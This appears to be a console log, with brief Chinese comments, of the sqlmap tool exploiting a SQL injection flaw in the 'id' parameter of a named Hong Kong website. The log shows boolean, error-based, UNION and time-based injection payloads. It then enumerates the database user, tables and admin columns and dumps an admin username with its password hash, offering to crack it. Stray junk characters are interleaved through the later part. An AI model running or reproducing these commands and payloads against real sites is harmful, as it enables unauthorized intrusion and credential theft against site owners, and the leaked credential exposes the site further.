D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
ms "Mysql" --current-user /* 注解:获取当前用户名称
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net starting at: 16:53:54
[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
 session file
[16:53:54] [INFO] resuming injection data from session file
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:53:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:53:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:53:55] [INFO] fetching current user
current user: 'root@localhost'
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
tput\www.wepost.com.hk' shutting down at: 16:53:58
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
ms "Mysql" --current-db /*当前数据库
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net starting at: 16:54:16
[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
session file
[16:54:16] [INFO] resuming injection data from session file
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:54:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:54:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:54:17] [INFO] fetching current database
current database: 'wepost'
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
tput\www.wepost.com.hk' shutting down at: 16:54:18
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
ms "Mysql" --tables -D "wepost" /*获取当前数据库的表名
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net starting at: 16:55:25
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
session file
[16:55:25] [INFO] resuming injection data from session file
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:55:25] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:55:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:55:26] [INFO] fetching tables for database 'wepost'
[16:55:27] [INFO] the SQL query used returns 6 entries
Database: wepost
[6 tables]
+-------------+
| admin       |
| article     |
| contributor |
| idea        |
| image       |
| issue       |
+-------------+
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
tput\www.wepost.com.hk' shutting down at: 16:55:33
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
ms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net starting at: 16:56:06
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
ssion': wepost, wepost
Database: wepost
Table: admin
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| password | varchar(32) |
| type     | varchar(10) |
| userid   | varchar(20) |
+----------+-------------+
 shutting down at: 16:56:19
& W+ q) `- T$ b9 Y% ^5 n5 bD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db, t, p- p) m! D; A# G
ms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容/ y- j& U2 G* B. u0 d
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net starting at: 16:57:14
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
1 x+ ~- q0 t8 f! l! wrecognized possible password hash values. do you want to use dictionary attack o
! ?2 s1 M1 x; J* g3 Un retrieved table items? [Y/n/q] y) K) K- ~# N+ I' k9 ^/ q7 F
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
7 W! O, r% @# zdo you want to use common password suffixes? (slow!) [y/N] y) [5 ~$ _4 F- M
Database: wepost
5 x( \& U( d( K5 o. ^Table: admin
[* t) s& U. m! Z[1 entry]* z7 H# P H; ]$ U
+----------------------------------+------------+0 x1 P, ^6 A7 n/ ~5 O4 O; @1 ^. q
| password | userid |
7 A6 \4 v+ k: }/ Q2 ]+----------------------------------+------------+" e' p x7 N7 p5 Z
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |- c. I0 f E# {3 ~9 Z) K
+----------------------------------+------------+8 z" _' s$ P9 ], t2 D6 J
shutting down at: 16:58:14
, J$ O+ u9 L* r* R& B2 ?' y: F' D6 {1 K7 H# P- M
D:\Python27\sqlmap> |